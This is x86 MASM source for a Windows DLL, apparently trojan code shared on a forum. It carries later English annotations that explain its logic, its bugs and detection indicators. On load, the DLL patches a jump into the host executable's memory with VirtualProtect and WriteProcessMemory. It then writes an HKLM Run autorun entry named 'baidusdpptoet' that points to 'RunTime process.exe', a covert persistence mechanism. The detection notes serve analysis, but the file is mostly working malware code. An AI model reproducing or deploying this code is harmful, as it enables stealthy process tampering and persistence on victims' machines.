去年坛子的大大给的思路写的 过栈回溯XXX
.486p
.model flat,stdcall
option casemap:none
assume fs:nothing
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
.data
; Data used by func (registry autorun) and start (in-memory patch of the host image).
szKeyAutoRun db 'Software\Microsoft\Windows\CurrentVersion\Run',0 ; Run key path; func opens it under HKEY_LOCAL_MACHINE
szValueAutoRun db 'baidusdpptoet',0     ; name of the Run value func writes
jmpaddr dd 00                           ; address start jumps to after patching (same value as hookaddr)
hookaddr dd 00                          ; host executable base + 100Bh, computed in start
oldprotect dd 00                        ; receives the previous page protection from VirtualProtect; no later call restores it
dllhandle dd 00                         ; this module's handle, copied from start's first argument
mumaexepatch byte "\RunTime process.exe",0 ; suffix appended to the current directory to form the Run value data
backbyte byte 5 dup (?);5-byte buffer (original comment: "back up 5 bytes"); start fills it with the new E9 jmp and never saves the bytes it overwrites
.code
; Empty stub: returns immediately. No call or offset reference to it appears in this file; presumably filler -- confirm.
funcxx proc
ret
funcxx endp
; Empty stub: returns immediately. No call or offset reference to it appears in this file; presumably filler -- confirm.
funcx proc
ret
funcx endp
; Empty stub: returns immediately. No call or offset reference to it appears in this file; presumably filler -- confirm.
funcxxx proc
ret
funcxxx endp
; Empty stub: returns immediately. No call or offset reference to it appears in this file; presumably filler -- confirm.
funcxaxx proc
ret
funcxaxx endp
;-----------------------------------------------------------------------
; DWORD threadx(LPVOID x)  -- thread routine meant to unload this DLL
; ABI:   stdcall (32-bit)
; In:    x = thread parameter (unused)
; Out:   eax = 0 on the fall-through path
; The FreeLibraryAndExitThread argument is `offset dllhandle`, i.e. the
; address of the dllhandle variable, not the handle value stored in it.
; No caller is visible: the CreateThread line in start that referenced
; this routine is commented out.
;-----------------------------------------------------------------------
threadx proc x:dword
invoke FreeLibraryAndExitThread,offset dllhandle,0 ; passes the variable's address, not its contents
mov eax,0                               ; only reached if the call above returns
ret
threadx endp
;-----------------------------------------------------------------------
; void func(void)  -- writes an autorun entry under
;        HKLM\Software\Microsoft\Windows\CurrentVersion\Run (szKeyAutoRun)
; ABI:   stdcall-style frame (MASM prologue/epilogue for the locals);
;        no arguments; eax is not set deliberately
; Value: szValueAutoRun ('baidusdpptoet') = <current directory> + mumaexepatch
;        ("\RunTime process.exe"), type REG_SZ. The data length passed is
;        lstrlen(), so the terminating NUL is not part of the stored data.
; No registry return code is checked: if RegCreateKey fails (HKLM writes
; normally need elevated rights), @hKey is used uninitialised and the
; remaining calls fail silently.
; No call to func appears in this file; start uses `offset func` as the
; target of the jmp it writes into the host image and reaches it by jmp,
; so the final ret here pops whatever start's frame left at [esp].
; Detection note: a Run value named 'baidusdpptoet' whose data ends in
; "\RunTime process.exe" is the persistence artefact this routine leaves.
;-----------------------------------------------------------------------
func proc
local @hKey                             ; HKEY returned by RegCreateKey (default dword)
local @szFileName[MAX_PATH]:byte        ; current directory followed by mumaexepatch
invoke RegCreateKey,HKEY_LOCAL_MACHINE,addr szKeyAutoRun ,addr @hKey ; opens/creates HKLM\...\Run; result ignored
;invoke GetModuleFileName,NULL,addr @szFileName,260
invoke GetCurrentDirectory,260,addr @szFileName ; current directory, not the module path (the GetModuleFileName variant is commented out)
invoke lstrcat,addr @szFileName,addr mumaexepatch ; appends "\RunTime process.exe"; lstrcat does not bound the write, so a directory near 260 chars overruns the local buffer
;inc eax
;mov @szFileName,'x'
invoke lstrlen,addr @szFileName         ; eax = length without the NUL
invoke RegSetValueEx,@hKey,offset szValueAutoRun,NULL,REG_SZ, addr @szFileName,eax ; eax is the rightmost argument, so it is pushed before the addr/lea pushes touch eax
invoke RegCloseKey,@hKey
ret
func endp
;-----------------------------------------------------------------------
; BOOL start(HINSTANCE x, DWORD y, LPVOID z)  -- DllMain-shaped entry point
; ABI:   stdcall (32-bit); MASM emits the push ebp / mov ebp,esp frame
; In:    x = this module's handle, y = attach/detach reason, z = reserved
; Out:   eax is never assigned on either path, so the BOOL the loader
;        receives is whatever eax holds at ret
; Clobb: ebx is written (`mov ebx ,hookaddr`) and not restored, although
;        stdcall treats it as callee-saved
;
; On DLL_PROCESS_ATTACH this routine:
;   1. saves x into dllhandle;
;   2. takes the host executable's base (GetModuleHandle(NULL)) plus the
;      hard-coded offset 100Bh as hookaddr/jmpaddr; nothing here checks
;      which image the host is or what lies at that offset;
;   3. assembles a 5-byte "E9 rel32" jump to func in backbyte, with
;      rel32 = func - hookaddr - 5; the bytes being overwritten are not saved;
;   4. calls VirtualProtect(jmpaddr, 1000, PAGE_EXECUTE_READWRITE, &oldprotect)
;      and WriteProcessMemory(GetCurrentProcess(), jmpaddr, backbyte, 5, NULL)
;      to write those 5 bytes into the host image; the old protection is
;      never restored and no return value is checked;
;   5. jumps through jmpaddr, i.e. into the freshly written patch.
; func is entered by jmp rather than call, so its final ret pops from this
; frame instead of a return address -- NOTE(review): this path does not
; appear to return to the loader; confirm on the target.
; Detection note: an RWX VirtualProtect on the host image followed by
; WriteProcessMemory against the current process, then the Run-key write
; in func, is a self-patching persistence pattern that image-integrity
; checks and EDR API monitoring can flag.
;-----------------------------------------------------------------------
start proc x,y,z:dword
.if y==DLL_PROCESS_ATTACH
push x                                  ; dllhandle = x
pop dllhandle
jmp xyz                                 ; target is the next instruction: no effect on control flow
xyz:
jmp pushaddr                            ; same
pushaddr:
invoke GetModuleHandle,NULL             ; eax = base of the host executable
add eax,100Bh                           ; hard-coded offset of the bytes to patch
mov hookaddr,eax;this now points at the chosen code (original comment, translated)
mov jmpaddr,eax                         ; hookaddr and jmpaddr hold the same address
;the unprotected region is hookaddr+100 (original comment, translated; the VirtualProtect below uses 1000 decimal)
nop
nop
nop
nop
nop
nop
mov byte ptr [backbyte],0E9H            ; opcode of jmp rel32
mov eax,offset func                     ; jump target
mov ebx ,hookaddr                       ; ebx clobbered without being saved
sub eax,ebx
sub eax,5                               ; rel32 = func - hookaddr - sizeof(jmp rel32)
mov dword ptr [backbyte+1],eax          ; backbyte = E9 <rel32>
invoke VirtualProtect, jmpaddr,1000,PAGE_EXECUTE_READWRITE, offset oldprotect ; result ignored; oldprotect is never applied back
;lea eax,jmpaddr
;lea esi, offset backbyte
;cld
;movsd
;movsb
invoke GetCurrentProcess                ; eax = pseudo-handle for this process
invoke WriteProcessMemory,eax, jmpaddr,offset backbyte,5,NULL ; writes the 5 patch bytes into the host image; result ignored
;invoke CreateThread,NULL,NULL,offset threadx,NULL,0,NULL
jmp jmpaddr                             ; presumably an indirect jmp through the dword (jmp dword ptr [jmpaddr]) -- confirm
.endif
ret                                     ; eax not set on either path
start endp
; Empty stub: returns immediately. No call or offset reference to it appears in this file; presumably filler -- confirm.
funcxxxxx proc
ret
funcxxxxx endp
end start